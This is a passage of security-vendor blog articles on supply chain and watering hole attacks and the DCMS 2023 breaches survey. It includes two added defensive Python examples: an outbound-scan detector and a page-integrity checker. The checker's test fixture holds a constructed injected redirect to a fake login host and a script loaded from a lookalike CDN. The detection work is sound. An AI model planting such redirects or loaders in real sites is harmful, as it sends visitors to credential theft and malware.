This kind of attack doesn’t just cause immediate damage like data loss. It also causes long-term reputational challenges for suppliers. As supply chains rely on trust, customers lose confidence in their suppliers’ abilities to protect themselves, and therefore their customers, from cyber threats. 

2. Kudos 

Hacking is a skill – albeit a dangerous one in the wrong hands. And hackers have egos. If one can successfully infiltrate supply chains, access customer data, install malware, etc., on a large scale and cause widespread damage, they can brag about it. The bigger the attack, the better. 

3. Financial gain

A supply chain is a perfect place for a hacker to compromise cash flow and payment systems between multiple companies to gain access to sensitive financial information. They can divert payments, demand ransom, and leak/sell sensitive data on a large scale. The more money they can make, the more worthwhile the hack is.

4. Disruption and theft

As is the case with other types of cyberattacks, supply chain hacks cause a lot of disruption. Because so much data is available for exploitation in supply chains, cybercriminals attack them to get hold of vast amounts of personal data, intellectual property, and confidential business information. This…

  • severely disrupts and even stops operations
  • causes financial losses
  • damages trust
  • injures brand reputation

Safeguard your business against supply chain hacks

Few companies take steps to formally review risks in their supply chains – around one in ten businesses review the risks posed by their immediate (13%) and wider suppliers (7%). 

You need to work with suppliers and feel confident that they work to the same high standards as you. Supply chain attacks pose a very real threat, but don’t let it get to you. 

There are some simple and affordable ways to give yourself (and make sure your suppliers have) a good amount of protection against threats. 

One way is to get a Cyber Essentials certification. This is a government-backed scheme to help businesses protect themselves in five core areas:

  • Secure configuration
  • Malware protection
  • Network firewalls
  • User access controls
  • Security update management

Applying the five principles to how you work can reduce your cyber risk by 98.5% and give you the confidence and understanding you need to speak to your suppliers about their security practices.

Want to know more about the threat posed by supply chain attacks and learn how to protect your business? Check out our new guide for everything you need to know.


What is a supply chain early warning system and how does it improve your cybersecurity?


89% of businesses have experienced a supply chain risk event in the past five years. Discover how a supply chain early warning system can help you reduce risk and stay one step ahead.

What is a supply chain early warning system?

A supply chain early warning system (EWS) identifies potential security threats in your supply chain, based on a combination of internal and external data. After analysing the data, the system notifies decision-makers and suggests measures to mitigate the threat or minimise the impact. Together with your cybersecurity tools, processes, and policies, it helps to protect your business against third-party threats.

In the past, supply chain early warning systems focussed on far-reaching external factors that could disrupt business operations. For example, natural disasters, critical component shortages, or industrial action. But, due to the growing threat of supply chain attacks, today’s systems play a crucial role in protecting businesses against cybercriminals.

Supply chain attacks increased by 633% in 2022.

– Sonatype, Stats of the Software Supply Chain

5 supply chain cybersecurity risks an early warning system detects

Supply chain attacks surpassed traditional malware-based exploits by more than 40% in 2022, according to the Identity Theft Resource Center’s annual Data Breach Report. In the past twelve months, supply chain attacks impacted over 10 million people representing 1,734 entities.

What makes them so difficult to detect, let alone stop, is the diverse array of delivery methods. Of the numerous supply chain risks to be aware of, these are among the most common.

Worried about the threat posed by supply chain attacks? Read our guide to protecting your business.

1. Watering hole attacks

The hacker inserts malicious software into a website that receives a lot of traffic from the target business or businesses. When someone visits the compromised site, the malware infiltrates the visitor’s defences to gain access to their systems or data. Watering hole attacks are difficult to detect and boast a higher-than-average success rate.

2. Compromised software development tools

The hacker compromises a supplier’s software development tools, infrastructure, or processes. This leaves any resulting applications built from them vulnerable to zero-day security exploits, putting end-users at risk.

3. Compromised website builders

The hacker compromises a supplier’s website via its website builder. Typically, the hacker installs malicious software or a redirect script into the target site, which sends users to a malicious clone of the website when they visit the URL.

4. Stolen product certificates

The hacker steals an official product certificate, which enables them to distribute malicious software and applications under the guise of legitimate products. 

5. Third-party data store breaches

The hacker infiltrates a third-party data centre, for example, via a botnet. Once inside, they can steal sensitive business or customer information which they can then:

  • Sell for profit on the dark web
  • Ransom back to the victim
  • Release to the public
  • Delete or corrupt

How do early warning systems protect you against supply chain threats?

Detect and respond to network vulnerabilities

Most businesses only realise a hacker has compromised their network when they spot suspicious activity. For example, when a network client scans the internet. But at this point, the damage may already be done. An early warning system proactively monitors your network for vulnerabilities and malware, giving you time to repair any breaches before hackers can exploit them.  
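The "network client scans the internet" indicator mentioned above, turned into a small detection routine as an added example that is not part of the original article: it reads flow-log lines and flags any internal host that contacts an unusually large number of distinct external addresses within one window. The log format, addresses, time window and threshold are all constructed for illustration.

```python
"""Flag an internal host that has started scanning the internet.

Added example, not from the original article: it reads flow-log lines of
the form "timestamp src_ip dst_ip dst_port" (a constructed format) and
reports any internal host that contacts an unusually large number of
distinct external addresses within one time window.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Address ranges treated as "inside"; anything else counts as the internet.
INTERNAL_NETWORKS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                     ip_network("192.168.0.0/16")]
WINDOW = timedelta(seconds=60)
DISTINCT_DESTINATION_THRESHOLD = 20   # constructed value; tune to your own baseline


def is_internal(ip):
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETWORKS)


def parse_flows(text):
    """Parse constructed flow lines into (timestamp, src, dst, port) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, port = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return flows


def detect_outbound_scans(flows, window=WINDOW, threshold=DISTINCT_DESTINATION_THRESHOLD):
    """Return {src_ip: (window_start, distinct_external_destinations)} for every
    internal source whose busiest window reached `threshold` distinct external hosts."""
    per_src = defaultdict(list)
    for ts, src, dst, _port in flows:
        if is_internal(src) and not is_internal(dst):
            per_src[src].append((ts, dst))
    alerts = {}
    for src, events in per_src.items():
        events.sort()
        busiest = None
        lo = 0
        for hi in range(len(events)):          # sliding window over sorted events
            while events[hi][0] - events[lo][0] > window:
                lo += 1
            distinct = {dst for _, dst in events[lo:hi + 1]}
            if busiest is None or len(distinct) > busiest[1]:
                busiest = (events[lo][0], len(distinct))
        if busiest and busiest[1] >= threshold:
            alerts[src] = busiest
    return alerts


def constructed_flow_log():
    """Constructed sample: one host browsing normally, one sweeping 30 external hosts."""
    base = datetime(2023, 10, 2, 9, 0, 0)
    lines = []
    for i, dst in enumerate(["203.0.113.5", "198.51.100.7", "203.0.113.9"] * 4):
        lines.append(f"{(base + timedelta(seconds=5 * i)).isoformat()} 10.0.0.12 {dst} 443")
    for i in range(30):
        lines.append(f"{(base + timedelta(seconds=i)).isoformat()} 10.0.0.45 198.51.100.{100 + i} 22")
    return "\n".join(lines)


if __name__ == "__main__":
    for src, (start, count) in detect_outbound_scans(parse_flows(constructed_flow_log())).items():
        print(f"ALERT {src}: {count} distinct external hosts in the window starting {start}")
```

A real deployment would feed this from the firewall or flow exporter and set the threshold from a few weeks of the organisation's own traffic rather than the constructed value used here.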

Identify and assess cyber risks

An effective supply chain early warning system raises your awareness of external cybersecurity threats that may impact your business. When your system identifies a potentially harmful event or attacker, it notifies relevant stakeholders. This helps you:

  • Quickly spot and assess risks
  • Proactively monitor emerging threats or incidents
  • Prepare your defences to minimise or mitigate the impact on your business

Raise stakeholder awareness

By keeping stakeholders informed of current and emerging threats, early warning systems help to raise awareness of your supply chain risks. Over time, you’ll understand what to look out for and where to invest your cybersecurity budget to protect against online threats. 

Forewarned is forearmed

A supply chain early warning system adds another layer of defence to your cybersecurity. It gives you a clear view of your risk landscape, so you can detect and respond to online threats more effectively.

However, you don’t necessarily need a specialist tool to dramatically improve your supply chain security. Cyber Essentials certification can help you get the basics in place. Meanwhile, a generalist security tool like CyberSmart Active Protect can give you early warning of vulnerabilities within your own organisation, mitigating many of the risks your business faces. Likewise, following the NCSC’s guidance on mapping your supply chain can also help better protect your organisation.

You can’t always control the security of your suppliers or partners, but by getting the fundamentals down, you can minimise your risk.



What is a watering hole attack and how can you prevent them?


In 2018, the Cambodian Ministry of Defence and several Vietnamese news outlets fell victim to a sophisticated cyberattack targeting multiple high-profile websites across Southeast Asia.

The attack went undetected for months, during which time anyone who visited the compromised sites was redirected to a page controlled by the hackers. From there, the hackers were free to distribute malware to the unfortunate victims. The notorious OceanLotus threat group claimed responsibility.

This technique is known as a watering hole attack, and OceanLotus was by no means the first group to target the places people visit rather than the individuals themselves. In this article, we explain what a watering hole attack is, how they work, and how you can protect your business against them.

What is a watering hole attack?

Watering hole attacks are a type of third-party or supply chain attack. The hacker aims to install malicious software on the victim’s computer or gain access to their network by compromising websites they visit frequently. The consequences can be severe, ranging from theft of sensitive customer information to making the victim’s computer part of a botnet.

The name “watering hole attack” derives from nature. Over the aeons, lions and other predators have adapted their hunting strategies to conserve energy. Instead of chasing prey across the scorching African savanna, they simply wait for the zebra or gazelle to visit a watering hole and pounce while it’s busy drinking. 

Cybercriminals typically use watering hole attacks to target large, well-protected organisations, either by compromising an employee’s computer or a partner business further up the supply chain. 

Watering hole attacks are difficult to detect because they harness the implicit trust people place in well-known organisations and institutions. And, because many successful attacks target exploits in browsers or systems, they have a high success rate. 

Worried about the threat posed by supply chain attacks? Check out our guide to protecting your business.

How do watering hole attacks work?

The average watering hole attack unfolds over three stages. 

1. Reconnaissance

The hacker gathers intelligence about the target’s browsing habits. This can include a mix of publicly available information and illegally obtained private data. They can then use this information to create a shortlist of suitable sites to host the attack. Usually, these are sites with lower-than-average security.

2. Planning

Once the hacker identifies the most suitable hosting domains, it’s time to decide how to launch the attack. The two most common options are to:

  1. Probe the shortlisted hosting domains for any potential weaknesses the criminals can exploit to compromise the legitimate website.
  2. Create a spoofed version or clone of a shortlisted hosting site that contains malware.

Some cybercriminals may combine the two approaches to increase their odds of success. In this scenario, the hacker compromises a legitimate website and inserts redirect code that sends victims to the fake site where the payload is delivered.

3. Design and execution

The hacker exploits any weaknesses to insert malicious code into the watering hole site or cloned website. Typically, this involves manipulating web technologies like HTML and JavaScript or using exploit kits that target specific IP addresses. When someone visits the compromised domain, their browser automatically downloads the malicious software. 

In the case of drive-by attacks, the hacker capitalises on the implicit trust users have in well-known websites by hiding malware in download buttons or links. When the victim clicks on the link, they inadvertently download the malicious software – often without even realising it. 

Remote access trojans (RATs) are a popular choice of malware among cybercriminals, as this grants access to the victim’s computer or systems.
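As an added defensive example that is not part of the original article, here is a simple baseline check a site owner can run to spot injected scripts or redirect code of the kind described in the planning and execution stages above: the scripts and redirects each page is expected to contain are recorded once, and the live page is re-checked against that record. The HTML, hostnames and helper names are all constructed for illustration.

```python
"""Baseline check for injected scripts and redirects on a site's own pages.

Added example, not from the original article: a site owner records the
scripts and redirects each page is expected to contain, then re-checks the
live page. Script hosts, inline scripts or meta-refresh redirects that are
not in the baseline are reported for review. All HTML here is constructed,
and the hostnames are placeholders.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _PageScanner(HTMLParser):
    """Collect external script hosts, inline script hashes and meta redirects."""

    def __init__(self):
        super().__init__()
        self.script_hosts = set()   # hostnames from <script src="...">
        self.inline_hashes = set()  # sha256 of each inline script body
        self.redirects = []         # targets of <meta http-equiv="refresh">
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.script_hosts.add(urlsplit(a["src"]).hostname or "(same-origin)")
            else:
                self._in_inline, self._buf = True, []
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            content = a.get("content") or ""
            idx = content.lower().find("url=")
            self.redirects.append(content[idx + 4:].strip() if idx >= 0 else content.strip())

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            body = "".join(self._buf).strip().encode()
            self.inline_hashes.add(hashlib.sha256(body).hexdigest())
            self._in_inline = False


def scan(html):
    """Return the page's script hosts, inline script hashes and redirects."""
    p = _PageScanner()
    p.feed(html)
    p.close()
    return {"hosts": p.script_hosts, "inline": p.inline_hashes, "redirects": p.redirects}


def findings(html, baseline):
    """List (kind, value) pairs for everything on the page that the baseline lacks."""
    seen = scan(html)
    out = [("unexpected_script_host", h) for h in sorted(seen["hosts"] - baseline["hosts"])]
    out += [("unexpected_inline_script", d[:12]) for d in sorted(seen["inline"] - baseline["inline"])]
    out += [("unexpected_redirect", r) for r in seen["redirects"] if r not in baseline["redirects"]]
    return out


# Constructed known-good page, captured when the site was last verified.
KNOWN_GOOD = """<html><head><title>Members area</title>
<script src="https://cdn.example.org/site.js"></script>
<script>window.memberPortal = true;</script>
</head><body><h1>Members area</h1></body></html>"""

# Constructed copy of the same page with a redirect and two extra scripts added.
SUSPECT = """<html><head><title>Members area</title>
<meta http-equiv="refresh" content="0; url=https://members-portal-login.invalid/">
<script src="https://cdn.example.org/site.js"></script>
<script>window.memberPortal = true;</script>
<script src="https://static.lookalike-cdn.invalid/loader.js"></script>
<script>document.location = "https://members-portal-login.invalid/";</script>
</head><body><h1>Members area</h1></body></html>"""

BASELINE = scan(KNOWN_GOOD)

if __name__ == "__main__":
    for kind, value in findings(SUSPECT, BASELINE):
        print(f"{kind}: {value}")
```

Run this from outside the web server (fetch the page as a visitor would) so that a compromise of the server itself cannot also hide the change.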

*Image: Supply chain security guidance, National Cyber Security Centre

How to prevent watering hole attacks

The first step is to familiarise yourself with cybersecurity best practices. Simple measures, like installing reliable antivirus software and upgrading your browser protection, can significantly reduce your cyber risk.

We recommend adopting these four measures, as a minimum.

Stay on top of system updates

Many cyberattacks work by exploiting unpatched vulnerabilities in operating systems, browsers, and software. And watering hole attacks are no different. By installing the latest security updates as soon as they become available, you can plug these gaps before cybercriminals have a chance to use them.

Regularly review and test your security

Many cybercriminals bank on the fact that most people think their antivirus software tackles threats for them. We recommend that you review your security tools, processes, and policies at least once a year to ensure you’re protected against the latest threats.

Educate and train your staff

The cybersecurity landscape is dynamic. Cybercriminals are constantly evolving their tactics and new threats emerge all the time. Then, there’s the human factor. According to Stanford University research, human error causes 85% of data breaches. Run regular training workshops to teach staff to identify suspicious activity, spot potential threats, and respond to cyber-attacks.

Get Cyber Essentials certified

Cyber Essentials is a government-backed scheme that provides a simple framework to help businesses protect against cyber-attacks. It’s separated into five technical controls:

  • Secure configuration
  • Malware protection
  • Network firewalls
  • User access controls
  • Security update management

Cyber Essentials is a more affordable option than advanced certifications, like ISO 27001. It’s also faster and less intensive, so it’s a good place to start. With the right guidance and support, you can become certified in just three days. This makes it the perfect solution for SMEs.

For more advanced recommendations, read the National Cyber Security Centre’s (NCSC) 12 principles of supply chain security.

It’s a jungle out there

Watering hole attacks are no longer a niche threat. Forbes named them as one of the top ten cybersecurity threats of 2022, reflecting the increase in supply chain attacks in recent years. 

The key thing to remember is that you’re not powerless. By adopting the measures we’ve recommended here, you can minimise your cyber risks and ensure you don’t fall prey to digital predators.


6 key takeaways from the DCMS Cyber Security Breaches Survey 2023


Each year, the Department for Digital, Culture, Media & Sport (DCMS) releases its hotly anticipated Cyber Security Breaches Survey. It’s a key source of data on how businesses across the UK approach cybersecurity, the threats they face, and issues that need to be addressed in the coming year.

But for all its usefulness, the report is also very long – usually stretching to thousands of words in length. So, to save you from reading the whole thing, we’ve put together a handy list of the key takeaways from the report. Here’s the stuff you need to know. 

1. Assessing supply chain risk is rare for small businesses

We’ve talked about the danger supply chains pose to businesses a lot. Happily, it appears that larger businesses have begun to wake up to the risk. 63% of large businesses undertook a cybersecurity risk assessment in the last year, alongside 51% of medium-sized firms.

However, the practice remains rare among smaller businesses. When the sample size is broadened to include businesses of every size, just 3 in 10 have undergone a risk assessment.

Why is this happening? Well, it’s possible many businesses don’t have the resources to sanction regular risk assessments, but it’s just as likely that many SMEs are simply unaware of the need. 

Worried about rising IT costs? Check out our guide to protecting your business on a budget.

2. A small number of businesses are taking cyber accreditations

The good news is that the proportion of UK organisations seeking extra guidance or information on cybersecurity is stable at 49% for businesses and 44% for charities. But this does mean that a large proportion of organisations either aren’t aware of or aren’t using guidance like the NCSC’s 10 Steps to Cyber Security or the government-backed Cyber Essentials accreditation.

According to the DCMS’s findings, just 14% of businesses and 15% of charities are aware of the Cyber Essentials scheme – rising to 50% of medium businesses and 59% of large businesses. And it’s a similar story with ISO 27001 certification with just 9% of businesses and 5% of charities adhering to the standard. Again, this is higher among large businesses (27%).

Although these figures might look alarming, there are a couple of caveats to bear in mind. First of all, the Cyber Essentials scheme was always going to take some time to bear fruit; it’s worth remembering the extremely limited cyber awareness across UK businesses before its launch. What’s more, the number of certified businesses is still growing steadily, up from 500 per month in January 2017 to just under 3500 in January 2023.

Added to this, the scheme was always likely to need to evolve to meet the needs of businesses. Given recent calls from UK companies for a new and improved Cyber Essentials certification, perhaps the time has come for the scheme to take the next step in its evolution.

3. Formal incident response plans aren’t widespread

The survey reveals that most organisations agree that they’d take several actions following a breach or cyber incident. However, the reality appears somewhat different. Only a minority of businesses (21%) have a formal incident response plan in place. This figure does rise amongst medium (47%) and large businesses (64%), indicating that it’s SMEs who are going without.

Perhaps this isn’t surprising: SMEs are often time- and resource-poor, and creating a thorough incident response plan isn’t a small undertaking. Nevertheless, it represents an area that both government bodies and companies like CyberSmart need to focus on in the coming year.

4. The number of identified breaches has declined 

At the risk of stating the obvious, cybercrime hasn’t decreased in the last year. But the number of breaches being reported by smaller businesses has declined. Just 32% of businesses and 24% of charities reported a breach or attack in the last 12 months – down from 39% of businesses and 30% of charities in the 2022 edition of the survey.

What’s going on? Are SMEs simply being attacked less? Unfortunately, no. 54% of SMEs in the UK experienced some form of cyber-attack in 2022. And, if we look at the figures for large businesses (69%) and high-income charities (56%) the numbers have remained stable from the 2022 report.

This seems to indicate that the drop is being driven by SMEs, which also suggests that they are undertaking less monitoring and logging of breaches than in previous years. Why? That brings us to our next key takeaway.

5. Cybersecurity is less of a priority for smaller businesses

It’s no secret that it’s a tricky time to be a small business. Economic uncertainty and a cost of living crisis have left many SMEs looking to reduce expenditure, particularly in areas like cybersecurity. This is borne out by the DCMS’s survey, with 68% of micro-businesses (10 employees or fewer) saying cyber security is a high priority, down from 80% last year.

In practice, this can mean less tracking and reporting of breaches, weaker defences, and greater reluctance to update tools, putting small businesses at a real disadvantage. But it doesn’t have to be this way. There are methods for budget-conscious businesses to reduce costs responsibly – we’ve outlined a few here.

6. Is cyber hygiene going backwards? 

Finally, cyber hygiene has long been a useful concept in helping businesses think about their security. The rationale behind it is simple. Most cyberattacks are pretty unsophisticated – think your common-or-garden phishing attack or a breach due to an unpatched vulnerability. 

This means businesses can avoid falling foul of most of them by using a set of basic “cyber hygiene” measures.

The most common of these hygiene measures are updated malware protection, cloud back-ups, passwords, restricted admin rights and network firewalls. However, all of these measures have seen a gradual decline over the last few editions of the DCMS report. For example: 

  • use of password policies (79% in 2021, vs. 70% in 2023)
  • use of network firewalls (78% in 2021 vs. 66% in 2023)
  • restricting admin rights (75% in 2021, vs. 67% in 2023)
  • policies to apply software security updates within 14 days (43% in 2021, vs. 31% in 2023).

DCMS analysis suggests that these trends appear to reflect shifts in the SME population, as figures across larger organisations have remained stable. As we mentioned earlier, it’s possible that, as many smaller businesses feel the pinch and place less importance on cybersecurity, cyber hygiene has begun to fall by the wayside. Whatever the reason, it’s a worrying development that could make some SMEs extremely vulnerable.

What have we learned from the DCMS Cyber Security Breaches Survey 2023?

Time to draw some broad-brush conclusions from the DCMS’s findings. First of all, the common theme running throughout the report is that the cost of living crisis is having a real impact on SMEs’ ability to protect themselves. Whether it’s the decline in breach reporting, so many businesses lacking incident response plans, or the fall in cyber hygiene standards, it’s clear SMEs need real assistance to bolster their defences.

Second, Cyber Essentials could be due for a revamp. The number of organisations who are aware of the accreditation, let alone completing it, remains too low.

Finally, although this piece may have made for a fairly grim read, there is an upside. These findings provide everyone within the UK cybersecurity industry a clear picture of where the problems lie and what we all need to do over the next 12 months to tackle them.

Want to know more about how to reduce cybersecurity costs responsibly? Check out our free guide to cybersecurity on a budget.
